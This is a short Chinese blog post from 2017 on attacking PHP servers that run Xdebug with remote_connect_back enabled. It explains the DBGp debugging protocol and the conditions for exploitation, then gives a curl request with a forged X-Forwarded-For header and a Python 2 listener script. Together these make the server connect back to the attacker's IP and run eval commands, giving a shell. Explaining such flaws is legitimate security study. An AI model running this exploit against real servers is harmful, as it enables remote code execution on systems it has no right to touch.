title: xdebug插件攻击
date: 2017-09-30 17:08:38
tags:
前一阵突然看到一个有关于xdebug的一个攻击面,不得不说这个想法还是很有意思的.自己搭环境记录一下.
关于Xdebug的攻击
刚学php的时候用的phpstorm,当时为了动态调试,配置Xdebug配了很久,当时对这个有一个比较模糊的认识,当时觉得是在浏览器还有ide还有server之间是有某些数据交互的,第一次配的的时候当时ide一直监听收不到数据,当时想要是自己可以操作数据来测试哪里出问题就好了,一直耿耿于怀,前一阵突然看到一个有关于xdebug的一个攻击面,不得不说这个想法还是很有意思的.
Xdebug调试的工作流程
1.ide开始调试监听本地9000端口
2.浏览器发送一个带有XDEBUG_SESSION_START的请求发给服务端
3.服务端收到这个参数,就会通知xdebug
4.xdebug收到通知了就会向来源的地址的9000端口发送一个请求
5.ide收到请求并响应建立连接
之后就是相互通讯然后调试代码了
首先Xdebug有关于远程调试是使用的DBGp协议
下面是有关于通讯流程的一个演示
利用条件
一般来说关于xdebug.remote_host这个配置默认是localhost也就是默认通讯的的都是localhost,这明显不利于我们的利用
但是如果xdebug.remote_connect_back这个配置启用的话xdebug.remote_host就会被忽略,并通过$ _SERVER ['HTTP_X_FORWARDED_FOR']和$ _SERVER ['REMOTE_ADDR']变量来获取ip
还有一个就是要开启xdebug.remote_enable,这个开关控制Xdebug是否应尝试联系正在监听主机和端口的调试客户端
xdebug.remote_connect_back = 1
xdebug.remote_enable = 1
也就是这两个是必要条件
利用方式
DBGp 的文档有一些敏感的操作
1.读文件
source -i transaction_id -f fileURI
2.eval
eval -i transaction_id - {DATA}
只需要构造请求的参数,XDEBUG_SESSION_START=xxx
还需要构造XFF头
然后检测服务端是否对XFF的地址的9000端口进行请求,就可以判断是否可以利用,
curl 'http://localhost/1.php?XDEBUG_SESSION_START=phpstrosssm' -H "X-Forwarded-For: localhost"
利用的exp这里之间粘贴原文章的,就是建立一个tcp的连接监听9000端口然后安装协议发送数据就可以了
#!/usr/bin/python2
import socket
ip_port = ('0.0.0.0',9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()
while True:
client_data = conn.recv(1024)
print(client_data)
data = raw_input('>> ')
conn.sendall('eval -i 1 -- %sx00' % data.encode('base64'))
利用方式就是先运行exp监听9000端口
获取连接curl 'http://localhost/1.php?XDEBUG_SESSION_START=phpstrosssm' -H "X-Forwarded-For: 你的公网ip地址"
然后exp接收到连接就可以调用system函数弹shell了.